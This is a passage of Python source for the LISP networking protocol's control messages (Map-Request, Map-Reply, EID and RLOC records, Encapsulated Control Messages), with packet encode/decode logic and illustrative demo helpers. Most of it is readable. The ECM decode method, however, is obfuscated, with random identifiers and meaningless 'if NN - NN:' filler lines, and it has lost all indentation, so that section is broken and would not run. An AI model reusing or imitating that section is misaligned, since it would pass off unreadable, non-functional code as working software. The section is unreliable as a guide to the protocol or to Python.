        self.smr_invoked_bit = True if (first_long & 0x00400000) else False
        self.mobile_node = True if (first_long & 0x00200000) else False
        self.xtr_id_present = True if (first_long & 0x00100000) else False
        self.local_xtr = True if (first_long & 0x00004000) else False
        self.dont_reply_bit = True if (first_long & 0x00002000) else False
        self.itr_rloc_count = (first_long >> 8) & 0x1f
        self.record_count = first_long & 0xff
        self.nonce = nonce[0]

        #
        # The xTR-ID, when present, trails the packet.
        #
        if (self.xtr_id_present):
            if (self.decode_xtr_id(packet) == False): return(None)

        format_size = struct.calcsize("H")
        if (len(packet) < format_size): return(None)

        afi = struct.unpack("H", packet[:format_size])
        self.source_eid.afi = socket.ntohs(afi[0])
        packet = packet[format_size::]

        if (self.source_eid.afi == LISP_AFI_LCAF):
            save_packet = packet
            packet = self.source_eid.lcaf_decode_iid(packet)
            if (packet == None):
                packet = self.lcaf_decode_json(save_packet)
                if (packet == None): return(None)
        elif (self.source_eid.afi != LISP_AFI_NONE):
            packet = self.source_eid.unpack_address(packet)
            if (packet == None): return(None)

        self.source_eid.mask_len = self.source_eid.host_mask_len()

        no_crypto = (os.getenv("LISP_NO_CRYPTO") != None)
        self.itr_rlocs = []
        count = self.itr_rloc_count + 1

        while (count != 0):
            format_size = struct.calcsize("H")
            if (len(packet) < format_size): return(None)

            afi = socket.ntohs(struct.unpack("H", packet[:format_size])[0])
            itr_rloc = lisp_address(LISP_AFI_NONE, "", 32, 0)
            itr_rloc.afi = afi

            #
            # An LCAF-encoded ITR-RLOC is either telemetry JSON or key
            # material; try JSON first and restore the packet if it was
            # not JSON.
            #
            if (itr_rloc.afi == LISP_AFI_LCAF):
                save_packet = packet
                json_packet = packet[format_size::]
                packet = self.lcaf_decode_json(json_packet)
                if (packet == json_packet): packet = save_packet

            if (itr_rloc.afi != LISP_AFI_LCAF):
                if (len(packet) < itr_rloc.addr_length()): return(None)
                packet = itr_rloc.unpack_address(packet[format_size::])
                if (packet == None): return(None)

                if (no_crypto):
                    self.itr_rlocs.append(itr_rloc)
                    count -= 1
                    continue

                addr_str = lisp_build_crypto_decap_lookup_key(itr_rloc, port)

                #
                # A plain AFI-encoded ITR-RLOC means the ITR is not doing
                # lisp-crypto, so remove any stale decap keys for it.
                #
                if (lisp_nat_traversal and itr_rloc.is_private_address() \
                    and source): itr_rloc = source

                decap_keys = lisp_crypto_keys_by_rloc_decap
                if (decap_keys.has_key(addr_str)): decap_keys.pop(addr_str)

                lisp_write_ipc_decap_key(addr_str, None)
            elif (self.json_telemetry == None):

                #
                # Decode the security-key LCAF and select a cipher suite.
                #
                save_packet = packet
                suite_keys = lisp_keys(1)
                packet = suite_keys.decode_lcaf(save_packet, 0)
                if (packet == None): return(None)

                cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
                    LISP_CS_25519_CHACHA]
                if (suite_keys.cipher_suite in cs_list):
                    if (suite_keys.cipher_suite == LISP_CS_25519_CBC or
                        suite_keys.cipher_suite == LISP_CS_25519_GCM):
                        key = lisp_keys(1, do_poly=False, do_chacha=False)
                    if (suite_keys.cipher_suite == LISP_CS_25519_CHACHA):
                        key = lisp_keys(1, do_poly=True, do_chacha=True)
                else:
                    key = lisp_keys(1, do_poly=False, do_curve=False,
                        do_chacha=False)
                packet = key.decode_lcaf(save_packet, 0)
                if (packet == None): return(None)

                if (len(packet) < format_size): return(None)
                afi = struct.unpack("H", packet[:format_size])[0]
                itr_rloc.afi = socket.ntohs(afi)
                if (len(packet) < itr_rloc.addr_length()): return(None)

                packet = itr_rloc.unpack_address(packet[format_size::])
                if (packet == None): return(None)

                if (no_crypto):
                    self.itr_rlocs.append(itr_rloc)
                    count -= 1
                    continue

                addr_str = lisp_build_crypto_decap_lookup_key(itr_rloc, port)

                stored_key = None
                if (lisp_nat_traversal and itr_rloc.is_private_address() \
                    and source): itr_rloc = source

                if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)):
                    keys = lisp_crypto_keys_by_rloc_decap[addr_str]
                    stored_key = keys[1] if keys and keys[1] else None

                new_key = True
                if (stored_key):
                    if (stored_key.compare_keys(key)):
                        self.keys = [None, stored_key, None, None]
                        lprint("Maintain stored decap-keys for RLOC {}". \
                            format(red(addr_str, False)))
                    else:
                        new_key = False
                        rekey_str = bold("Remote decap-rekeying", False)
                        lprint("{} for RLOC {}".format(rekey_str,
                            red(addr_str, False)))
                        key.copy_keypair(stored_key)
                        key.uptime = stored_key.uptime
                        stored_key = None

                if (stored_key == None):
                    self.keys = [None, key, None, None]
                    if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
                        key.local_public_key = None
                        lprint("{} for {}".format(bold("Ignoring decap-keys",
                            False), red(addr_str, False)))
                    elif (key.remote_public_key != None):
                        if (new_key):
                            lprint("{} for RLOC {}".format(
                                bold("New decap-keying", False),
                                red(addr_str, False)))
                        key.compute_shared_key("decap")
                        key.add_key_by_rloc(addr_str, False)

            self.itr_rlocs.append(itr_rloc)
            count -= 1

        format_size = struct.calcsize("BBH")
        if (len(packet) < format_size): return(None)

        subscribe, mask_len, afi = struct.unpack("BBH", packet[:format_size])
        self.subscribe_bit = (subscribe & 0x80)
        self.target_eid.afi = socket.ntohs(afi)
        packet = packet[format_size::]

        self.target_eid.mask_len = mask_len
        if (self.target_eid.afi == LISP_AFI_LCAF):
            packet, target_group = self.target_eid.lcaf_decode_eid(packet)
            if (packet == None): return(None)
            if (target_group): self.target_group = target_group
        else:
            packet = self.target_eid.unpack_address(packet)
            if (packet == None): return(None)
            packet = packet[format_size::]

        return(packet)

    def print_eid_tuple(self):
        return(lisp_print_eid_tuple(self.target_eid, self.target_group))

    def encode_xtr_id(self, packet):
        xtr_id_upper = self.xtr_id >> 64
        xtr_id_lower = self.xtr_id & 0xffffffffffffffff
        xtr_id_upper = byte_swap_64(xtr_id_upper)
        xtr_id_lower = byte_swap_64(xtr_id_lower)
        packet += struct.pack("QQ", xtr_id_upper, xtr_id_lower)
        return(packet)

    def decode_xtr_id(self, packet):
        format_size = struct.calcsize("QQ")
        if (len(packet) < format_size): return(None)
        packet = packet[len(packet) - format_size::]
        xtr_id_upper, xtr_id_lower = struct.unpack("QQ", packet[:format_size])
        xtr_id_upper = byte_swap_64(xtr_id_upper)
        xtr_id_lower = byte_swap_64(xtr_id_lower)
        self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
        return(True)
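
#
# Usage sketch for the Map-Request first long decoded above: the same
# masks, applied to a hand-built word. Illustrative only; assumes this
# module's LISP_MAP_REQUEST constant.
#
def _demo_map_request_first_long(itr_rloc_count=1, record_count=1):
    first_long = (LISP_MAP_REQUEST << 28) | (itr_rloc_count << 8) | \
        record_count
    first_long |= 0x08000000                    # set the A (auth) bit
    assert ((first_long >> 8) & 0x1f) == itr_rloc_count
    assert (first_long & 0xff) == record_count
    return(first_long)
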
class lisp_map_reply():
    def __init__(self):
        self.rloc_probe = False
        self.echo_nonce_capable = False
        self.security = False
        self.record_count = 0
        self.hop_count = 0
        self.nonce = 0
        self.keys = None

    def print_map_reply(self):
        line = ("{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " +
            "nonce: 0x{}")
        lprint(line.format(bold("Map-Reply", False),
            "R" if self.rloc_probe else "r",
            "E" if self.echo_nonce_capable else "e",
            "S" if self.security else "s", self.hop_count, self.record_count,
            lisp_hex_string(self.nonce)))

    def encode(self):
        first_long = (LISP_MAP_REPLY << 28) | self.record_count
        first_long |= self.hop_count << 8
        if (self.rloc_probe): first_long |= 0x08000000
        if (self.echo_nonce_capable): first_long |= 0x04000000
        if (self.security): first_long |= 0x02000000

        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("Q", self.nonce)
        return(packet)

    def decode(self, packet):
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = first_long[0]
        packet = packet[format_size::]

        packet_format = "Q"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        nonce = struct.unpack(packet_format, packet[:format_size])
        packet = packet[format_size::]

        first_long = socket.ntohl(first_long)
        self.rloc_probe = True if (first_long & 0x08000000) else False
        self.echo_nonce_capable = True if (first_long & 0x04000000) else False
        self.security = True if (first_long & 0x02000000) else False
        self.hop_count = (first_long >> 8) & 0xff
        self.record_count = first_long & 0xff
        self.nonce = nonce[0]

        #
        # If this Map-Reply answers a crypto Map-Request, pick up the keys
        # negotiated under the nonce and retire the nonce entry.
        #
        if (lisp_crypto_keys_by_nonce.has_key(self.nonce)):
            self.keys = lisp_crypto_keys_by_nonce[self.nonce]
            self.keys[1].delete_key_by_nonce(self.nonce)

        return(packet)
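
#
# Usage sketch for lisp_map_reply.encode()/decode(): pack and re-parse the
# 4-byte header word. Illustrative only; assumes this module's
# LISP_MAP_REPLY constant.
#
def _demo_map_reply_header(hop_count=3, record_count=1):
    import socket, struct
    first_long = (LISP_MAP_REPLY << 28) | (hop_count << 8) | record_count
    wire = struct.pack("I", socket.htonl(first_long))
    decoded = socket.ntohl(struct.unpack("I", wire)[0])
    assert ((decoded >> 8) & 0xff) == hop_count
    assert (decoded & 0xff) == record_count
    return(wire)
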
class lisp_eid_record():
    def __init__(self):
        self.record_ttl = 0
        self.rloc_count = 0
        self.action = 0
        self.authoritative = False
        self.ddt_incomplete = False
        self.signature_count = 0
        self.map_version = 0
        self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)

    def print_prefix(self):
        if (self.group.is_null()):
            return(green(self.eid.print_prefix(), False))
        return(green(self.eid.print_sg(self.group), False))

    def print_ttl(self):
        ttl = self.record_ttl
        if (self.record_ttl & 0x80000000):
            ttl = str(self.record_ttl & 0x7fffffff) + " secs"
        elif ((ttl % 60) == 0):
            ttl = str(ttl / 60) + " hours"
        else:
            ttl = str(ttl) + " mins"
        return(ttl)

    def store_ttl(self):
        ttl = self.record_ttl * 60
        if (self.record_ttl & 0x80000000): ttl = self.record_ttl & 0x7fffffff
        return(ttl)
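
    #
    # TTL examples: print_ttl()/store_ttl() treat record-ttl as minutes, so
    # a value of 120 prints as "2 hours" and stores as 7200 seconds; with
    # the high-order bit set, 0x80000078 means 120 seconds directly.
    #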
    def print_record(self, indent, ddt):
        incomplete_str = ""
        sig_str = ""
        action_str = bold("invalid-action", False)
        if (ddt):
            if (self.action < len(lisp_map_referral_action_string)):
                action_str = lisp_map_referral_action_string[self.action]
                action_str = bold(action_str, False)
                incomplete_str = (", " + bold("ddt-incomplete", False)) if \
                    self.ddt_incomplete else ""
                sig_str = (", sig-count: " + str(self.signature_count)) if \
                    (self.signature_count != 0) else ""
        else:
            if (self.action < len(lisp_map_reply_action_string)):
                action_str = lisp_map_reply_action_string[self.action]
                if (self.action != LISP_NO_ACTION):
                    action_str = bold(action_str, False)

        afi = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
        line = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
            "{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")
        lprint(line.format(indent, self.print_ttl(), self.rloc_count,
            action_str, "auth" if (self.authoritative is True) else "non-auth",
            incomplete_str, sig_str, self.map_version, afi,
            green(self.print_prefix(), False)))

    def encode(self):
        flags = self.action << 13
        if (self.authoritative): flags |= 0x1000
        if (self.ddt_incomplete): flags |= 0x800

        #
        # Decide on the AFI: LCAF for instance-ids, (S,G) entries, and
        # negative AFIs (geo-prefixes and the like).
        #
        afi = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
        if (afi < 0): afi = LISP_AFI_LCAF
        sg = (self.group.is_null() == False)
        if (sg): afi = LISP_AFI_LCAF

        sig_mv = (self.signature_count << 12) | self.map_version
        mask_len = 0 if self.eid.is_binary() == False else self.eid.mask_len

        packet = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
            self.rloc_count, mask_len, socket.htons(flags),
            socket.htons(sig_mv), socket.htons(afi))

        #
        # Encode (S,G) entries in an LCAF.
        #
        if (sg):
            packet += self.eid.lcaf_encode_sg(self.group)
            return(packet)

        #
        # A geo-prefix with no instance-id replaces the just-packed AFI.
        #
        if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
            packet = packet[0:-2]
            packet += self.eid.address.encode_geo()
            return(packet)

        #
        # Instance-id (and other LCAF-encoded) EIDs.
        #
        if (afi == LISP_AFI_LCAF):
            packet += self.eid.lcaf_encode_iid()
            return(packet)

        #
        # Plain AFI-encoded EID address.
        #
        packet += self.eid.pack_address()
        return(packet)
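
    #
    # Encoding order above: the fixed "IBBHHH" header first, then exactly
    # one of an (S,G) LCAF, a geo-coord encoding (which replaces the
    # just-packed AFI), an instance-id LCAF, or a bare AFI-encoded EID
    # address.
    #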
    def decode(self, packet):
        packet_format = "IBBHHH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        self.record_ttl, self.rloc_count, self.eid.mask_len, flags, \
            self.map_version, self.eid.afi = struct.unpack(packet_format,
            packet[:format_size])

        self.record_ttl = socket.ntohl(self.record_ttl)
        flags = socket.ntohs(flags)
        self.action = (flags >> 13) & 0x7
        self.authoritative = True if ((flags >> 12) & 1) else False
        self.ddt_incomplete = True if ((flags >> 11) & 1) else False
        self.map_version = socket.ntohs(self.map_version)
        self.signature_count = self.map_version >> 12
        self.map_version = self.map_version & 0xfff
        self.eid.afi = socket.ntohs(self.eid.afi)
        self.eid.instance_id = 0
        packet = packet[format_size::]

        #
        # An LCAF-encoded EID may carry an (S,G) group.
        #
        if (self.eid.afi == LISP_AFI_LCAF):
            packet, group = self.eid.lcaf_decode_eid(packet)
            if (group): self.group = group
            self.group.instance_id = self.eid.instance_id
            return(packet)

        packet = self.eid.unpack_address(packet)
        return(packet)

    def print_eid_tuple(self):
        return(lisp_print_eid_tuple(self.eid, self.group))
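
#
# Usage sketch for the EID-record header: the fixed part is packed with
# "IBBHHH" (ttl, rloc-count, mask-len, action/flags, sig-count/map-version,
# afi), 12 bytes total, as in lisp_eid_record.encode(). Illustrative only;
# assumes this module's LISP_NO_ACTION and LISP_AFI_IPV4 constants.
#
def _demo_eid_record_header(ttl=1440, rloc_count=1, mask_len=32):
    import socket, struct
    flags = (LISP_NO_ACTION << 13) | 0x1000     # authoritative bit
    header = struct.pack("IBBHHH", socket.htonl(ttl), rloc_count, mask_len,
        socket.htons(flags), 0, socket.htons(LISP_AFI_IPV4))
    assert len(header) == struct.calcsize("IBBHHH")
    return(header)
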
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
class lisp_ecm():
    def __init__(self, sport):
        self.security = False
        self.ddt = False
        self.to_etr = False
        self.to_ms = False
        self.length = 0
        self.ttl = LISP_DEFAULT_ECM_TTL
        self.protocol = LISP_UDP_PROTOCOL
        self.ip_checksum = 0
        self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.udp_sport = sport
        self.udp_dport = LISP_CTRL_PORT
        self.udp_checksum = 0
        self.udp_length = 0
        self.afi = LISP_AFI_NONE

    def print_ecm(self):
        line = ("{} -> flags: {}{}{}{}, " +
            "inner IP: {} -> {}, inner UDP: {} -> {}")
        lprint(line.format(bold("ECM", False), "S" if self.security else "s",
            "D" if self.ddt else "d", "E" if self.to_etr else "e",
            "M" if self.to_ms else "m",
            green(self.source.print_address(), False),
            green(self.dest.print_address(), False), self.udp_sport,
            self.udp_dport))

    def encode(self, packet, inner_source, inner_dest):
        self.udp_length = len(packet) + 8
        self.source = inner_source
        self.dest = inner_dest
        if (inner_dest.is_ipv4()):
            self.afi = LISP_AFI_IPV4
            self.length = self.udp_length + 20
        if (inner_dest.is_ipv6()):
            self.afi = LISP_AFI_IPV6
            self.length = self.udp_length

        #
        # Build the 4-byte ECM header, then the inner IP and UDP headers.
        #
        first_long = (LISP_ECM << 28)
        if (self.security): first_long |= 0x08000000
        if (self.ddt): first_long |= 0x04000000
        if (self.to_etr): first_long |= 0x02000000
        if (self.to_ms): first_long |= 0x01000000

        ecm = struct.pack("I", socket.htonl(first_long))

        ip = ""
        if (self.afi == LISP_AFI_IPV4):
            ip = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
                0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
            ip += self.source.pack_address()
            ip += self.dest.pack_address()
            ip = lisp_ip_checksum(ip)
        if (self.afi == LISP_AFI_IPV6):
            ip = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
                self.protocol, self.ttl)
            ip += self.source.pack_address()
            ip += self.dest.pack_address()

        sport = socket.htons(self.udp_sport)
        dport = socket.htons(self.udp_dport)
        udp_len = socket.htons(self.udp_length)
        checksum = socket.htons(self.udp_checksum)
        udp = struct.pack("HHHH", sport, dport, udp_len, checksum)
        return(ecm + ip + udp)
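
    #
    # Length bookkeeping above: for IPv4, self.length covers the 20-byte
    # inner IP header plus UDP; for IPv6 it is the payload length, i.e.
    # just the UDP portion. udp_length is always the 8-byte UDP header
    # plus data.
    #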
def decode ( self , packet ) :
if 75 - 75: Oo0Ooo - OoOoOO00 + oO0o % i1IIi * OOooOOo
if 56 - 56: OoOoOO00 / OoO0O00 / I1IiiI % OoooooooOO
if 39 - 39: I1IiiI + II111iiii * Oo0Ooo % Ii1I . o0oOOo0O0Ooo * oO0o
if 42 - 42: Ii1I / Oo0Ooo
O0O00Oo = "I"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 25 - 25: OoooooooOO % Ii1I * I1Ii111 * I11i + I1IiiI % I1ii11iIi11i
i1OOoO0OO0oO = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
if 70 - 70: Ii1I + I1ii11iIi11i * I11i * i1IIi . I1Ii111
i1OOoO0OO0oO = socket . ntohl ( i1OOoO0OO0oO [ 0 ] )
self . security = True if ( i1OOoO0OO0oO & 0x08000000 ) else False
self . ddt = True if ( i1OOoO0OO0oO & 0x04000000 ) else False
self . to_etr = True if ( i1OOoO0OO0oO & 0x02000000 ) else False
self . to_ms = True if ( i1OOoO0OO0oO & 0x01000000 ) else False
packet = packet [ IiIii1i : : ]
if 76 - 76: OoooooooOO * OoOoOO00 . OoooooooOO
if 46 - 46: ooOoO0o * o0oOOo0O0Ooo % II111iiii / I1Ii111
if 29 - 29: OoO0O00 - i11iIiiIii % Oo0Ooo % o0oOOo0O0Ooo
if 30 - 30: oO0o - Ii1I % Ii1I
if ( len ( packet ) < 1 ) : return ( None )
Iii11111I1iii = struct . unpack ( "B" , packet [ 0 : 1 ] ) [ 0 ]
Iii11111I1iii = Iii11111I1iii >> 4
if 8 - 8: IiII
if ( Iii11111I1iii == 4 ) :
IiIii1i = struct . calcsize ( "HHIBBH" )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 68 - 68: IiII . OoooooooOO - i11iIiiIii + i11iIiiIii
oOo0oo , IIi1I1 , oOo0oo , oO0Oo0O , IiI1i1i1 , IiiI11iIi = struct . unpack ( "HHIBBH" , packet [ : IiIii1i ] )
self . length = socket . ntohs ( IIi1I1 )
self . ttl = oO0Oo0O
self . protocol = IiI1i1i1
self . ip_checksum = socket . ntohs ( IiiI11iIi )
self . source . afi = self . dest . afi = LISP_AFI_IPV4
if 12 - 12: Oo0Ooo * Ii1I / OoO0O00 % oO0o / I11i * ooOoO0o
if 64 - 64: I1IiiI % I1Ii111 + OoooooooOO
if 11 - 11: I1Ii111
if 87 - 87: i11iIiiIii * I1ii11iIi11i + OOooOOo - ooOoO0o
IiI1i1i1 = struct . pack ( "H" , 0 )
IIiIII1I1i = struct . calcsize ( "HHIBB" )
I1iiI1IiI1iii = struct . calcsize ( "H" )
packet = packet [ : IIiIII1I1i ] + IiI1i1i1 + packet [ IIiIII1I1i + I1iiI1IiI1iii : ]
if 28 - 28: iII111i - i1IIi - OOooOOo
packet = packet [ IiIii1i : : ]
packet = self . source . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = self . dest . unpack_address ( packet )
if ( packet == None ) : return ( None )
if 54 - 54: i11iIiiIii
if 57 - 57: I11i / IiII * i1IIi + II111iiii . o0oOOo0O0Ooo
if ( Iii11111I1iii == 6 ) :
IiIii1i = struct . calcsize ( "IHBB" )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 11 - 11: II111iiii
oOo0oo , IIi1I1 , IiI1i1i1 , oO0Oo0O = struct . unpack ( "IHBB" , packet [ : IiIii1i ] )
self . length = socket . ntohs ( IIi1I1 )
self . protocol = IiI1i1i1
self . ttl = oO0Oo0O
self . source . afi = self . dest . afi = LISP_AFI_IPV6
if 66 - 66: Ii1I - I1IiiI . OoooooooOO * I1Ii111
packet = packet [ IiIii1i : : ]
packet = self . source . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = self . dest . unpack_address ( packet )
if ( packet == None ) : return ( None )
if 16 - 16: IiII * OoO0O00 * i11iIiiIii - ooOoO0o
if 88 - 88: iIii1I11I1II1 / Ii1I * IiII / I1Ii111
self . source . mask_len = self . source . host_mask_len ( )
self . dest . mask_len = self . dest . host_mask_len ( )
if 31 - 31: O0 . I1IiiI
IiIii1i = struct . calcsize ( "HHHH" )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 8 - 8: OoOoOO00
OO0o0OO0 , o0 , IIi1I1 , IiiI11iIi = struct . unpack ( "HHHH" , packet [ : IiIii1i ] )
self . udp_sport = socket . ntohs ( OO0o0OO0 )
self . udp_dport = socket . ntohs ( o0 )
self . udp_length = socket . ntohs ( IIi1I1 )
self . udp_checksum = socket . ntohs ( IiiI11iIi )
packet = packet [ IiIii1i : : ]
return ( packet )
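
#
# Illustrative sketch (not in the original source): how an ECM header can
# round-trip through encode()/decode() above. lisp_ecm and lisp_address are
# this file's classes; the constructor argument, addresses, and payload are
# assumed example values only.
#
# def lisp_ecm_roundtrip_example(udp_payload):
#     inner_source = lisp_address(LISP_AFI_IPV4, "10.0.0.1", 32, 0)
#     inner_dest = lisp_address(LISP_AFI_IPV4, "10.0.0.2", 32, 0)
#     ecm = lisp_ecm(4342)
#     header = ecm.encode(udp_payload, inner_source, inner_dest)
#     decoded = lisp_ecm(4342)
#     return(decoded.decode(header + udp_payload))
#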
class lisp_rloc_record():
    def __init__(self):
        self.priority = 0
        self.weight = 0
        self.mpriority = 0
        self.mweight = 0
        self.local_bit = False
        self.probe_bit = False
        self.reach_bit = False
        self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.geo = None
        self.elp = None
        self.rle = None
        self.json = None
        self.rloc_name = None
        self.keys = None

    def print_rloc_name(self, cour=False):
        if (self.rloc_name == None): return("")
        rloc_name = self.rloc_name
        if (cour): rloc_name = lisp_print_cour(rloc_name)
        return('rloc-name: {}'.format(blue(rloc_name, cour)))

    def print_record(self, indent):
        rloc_str = self.print_rloc_name()
        if (rloc_str != ""): rloc_str = ", " + rloc_str

        geo_str = ""
        if (self.geo):
            name = ""
            if (self.geo.geo_name): name = "'{}' ".format(self.geo.geo_name)
            geo_str = ", geo: {}{}".format(name, self.geo.print_geo())

        elp_str = ""
        if (self.elp):
            name = ""
            if (self.elp.elp_name): name = "'{}' ".format(self.elp.elp_name)
            elp_str = ", elp: {}{}".format(name, self.elp.print_elp(True))

        rle_str = ""
        if (self.rle):
            name = ""
            if (self.rle.rle_name): name = "'{}' ".format(self.rle.rle_name)
            rle_str = ", rle: {}{}".format(name, self.rle.print_rle(False,
                True))

        json_str = ""
        if (self.json):
            name = ""
            if (self.json.json_name):
                name = "'{}' ".format(self.json.json_name)

            json_str = ", json: {}".format(self.json.print_json(False))

        key_str = ""
        if (self.rloc.is_null() == False and self.keys and self.keys[1]):
            key_str = ", " + self.keys[1].print_keys()

        line = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
            + "{}{}{}{}{}{}{}")
        lprint(line.format(indent, self.print_flags(), self.priority,
            self.weight, self.mpriority, self.mweight, self.rloc.afi,
            red(self.rloc.print_address_no_iid(), False), rloc_str, geo_str,
            elp_str, rle_str, json_str, key_str))

    def print_flags(self):
        return("{}{}{}".format("L" if self.local_bit else "l",
            "P" if self.probe_bit else "p", "R" if self.reach_bit else "r"))

    def store_rloc_entry(self, rloc_entry):
        rloc = rloc_entry.rloc if (rloc_entry.translated_rloc.is_null()) \
            else rloc_entry.translated_rloc

        self.rloc.copy_address(rloc)

        if (rloc_entry.rloc_name):
            self.rloc_name = rloc_entry.rloc_name

        if (rloc_entry.geo):
            self.geo = rloc_entry.geo
        else:
            name = rloc_entry.geo_name
            if (name and lisp_geo_list.has_key(name)):
                self.geo = lisp_geo_list[name]

        if (rloc_entry.elp):
            self.elp = rloc_entry.elp
        else:
            name = rloc_entry.elp_name
            if (name and lisp_elp_list.has_key(name)):
                self.elp = lisp_elp_list[name]

        if (rloc_entry.rle):
            self.rle = rloc_entry.rle
        else:
            name = rloc_entry.rle_name
            if (name and lisp_rle_list.has_key(name)):
                self.rle = lisp_rle_list[name]

        if (rloc_entry.json):
            self.json = rloc_entry.json
        else:
            name = rloc_entry.json_name
            if (name and lisp_json_list.has_key(name)):
                self.json = lisp_json_list[name]

        self.priority = rloc_entry.priority
        self.weight = rloc_entry.weight
        self.mpriority = rloc_entry.mpriority
        self.mweight = rloc_entry.mweight

    def encode_json(self, lisp_json):
        json_string = lisp_json.json_string
        kid = 0
        if (lisp_json.json_encrypted):
            kid = (lisp_json.json_key_id << 5) | 0x02

        lcaf_type = LISP_LCAF_JSON_TYPE
        lcaf_afi = socket.htons(LISP_AFI_LCAF)
        addr_len = self.rloc.addr_length() + 2

        lcaf_len = socket.htons(len(json_string) + addr_len)
        json_len = socket.htons(len(json_string))
        packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, kid,
            lcaf_len, json_len)
        packet += json_string

        #
        # Append the RLOC address only for telemetry JSON, otherwise
        # append an AFI of 0.
        #
        if (lisp_is_json_telemetry(json_string)):
            packet += struct.pack("H", socket.htons(self.rloc.afi))
            packet += self.rloc.pack_address()
        else:
            packet += struct.pack("H", 0)

        return(packet)

    def encode_lcaf(self):
        lcaf_afi = socket.htons(LISP_AFI_LCAF)
        geo_lcaf = ""
        if (self.geo):
            geo_lcaf = self.geo.encode_geo()

        elp_lcaf = ""
        if (self.elp):
            elp_recs = ""
            for elp_node in self.elp.elp_nodes:
                afi = socket.htons(elp_node.address.afi)
                flags = 0
                if (elp_node.eid): flags |= 0x4
                if (elp_node.probe): flags |= 0x2
                if (elp_node.strict): flags |= 0x1
                flags = socket.htons(flags)
                elp_recs += struct.pack("HH", flags, afi)
                elp_recs += elp_node.address.pack_address()

            elp_len = socket.htons(len(elp_recs))
            elp_lcaf = struct.pack("HBBBBH", lcaf_afi, 0, 0,
                LISP_LCAF_ELP_TYPE, 0, elp_len)
            elp_lcaf += elp_recs

        rle_lcaf = ""
        if (self.rle):
            rle_recs = ""
            for rle_node in self.rle.rle_nodes:
                afi = socket.htons(rle_node.address.afi)
                rle_recs += struct.pack("HBBH", 0, 0, rle_node.level, afi)
                rle_recs += rle_node.address.pack_address()
                if (rle_node.rloc_name):
                    rle_recs += struct.pack("H", socket.htons(LISP_AFI_NAME))
                    rle_recs += rle_node.rloc_name + "\0"

            rle_len = socket.htons(len(rle_recs))
            rle_lcaf = struct.pack("HBBBBH", lcaf_afi, 0, 0,
                LISP_LCAF_RLE_TYPE, 0, rle_len)
            rle_lcaf += rle_recs

        json_lcaf = ""
        if (self.json):
            json_lcaf = self.encode_json(self.json)

        sec_lcaf = ""
        if (self.rloc.is_null() == False and self.keys and self.keys[1]):
            sec_lcaf = self.keys[1].encode_lcaf(self.rloc)

        name = ""
        if (self.rloc_name):
            name += struct.pack("H", socket.htons(LISP_AFI_NAME))
            name += self.rloc_name + "\0"

        #
        # Wrap the RLOC address and all optional encodings in an AFI-List
        # LCAF.
        #
        lcaf_len = len(geo_lcaf) + len(elp_lcaf) + len(rle_lcaf) + \
            len(sec_lcaf) + 2 + len(json_lcaf) + self.rloc.addr_length() + \
            len(name)

        lcaf_len = socket.htons(lcaf_len)
        lcaf = struct.pack("HBBBBHH", lcaf_afi, 0, 0,
            LISP_LCAF_AFI_LIST_TYPE, 0, lcaf_len, socket.htons(self.rloc.afi))
        lcaf += self.rloc.pack_address()
        return(lcaf + name + geo_lcaf + elp_lcaf + rle_lcaf + sec_lcaf +
            json_lcaf)

    def encode(self):
        flags = 0
        if (self.local_bit): flags |= 0x0004
        if (self.probe_bit): flags |= 0x0002
        if (self.reach_bit): flags |= 0x0001

        packet = struct.pack("BBBBHH", self.priority, self.weight,
            self.mpriority, self.mweight, socket.htons(flags),
            socket.htons(self.rloc.afi))

        if (self.geo or self.elp or self.rle or self.keys or
            self.rloc_name or self.json):
            packet = packet[0:-2] + self.encode_lcaf()
        else:
            packet += self.rloc.pack_address()

        return(packet)
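
    #
    # Illustrative note (not in the original source): the fixed part of an
    # encoded RLOC-record is priority/weight/mpriority/mweight (one byte
    # each), a 16-bit flags field (the L/P/R bits printed above), and a
    # 16-bit AFI. A plain RLOC appends a packed address; when any of
    # geo/elp/rle/keys/rloc-name/json is present, the AFI is replaced by an
    # LCAF encoding from encode_lcaf() instead.
    #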

    def decode_lcaf(self, packet, nonce, ms_json_encrypt):
        packet_format = "HBBBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        afi, rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
            struct.unpack(packet_format, packet[:format_size])

        lcaf_len = socket.ntohs(lcaf_len)
        packet = packet[format_size::]
        if (lcaf_len > len(packet)): return(None)

        #
        # Process each supported LCAF type.
        #
        if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):
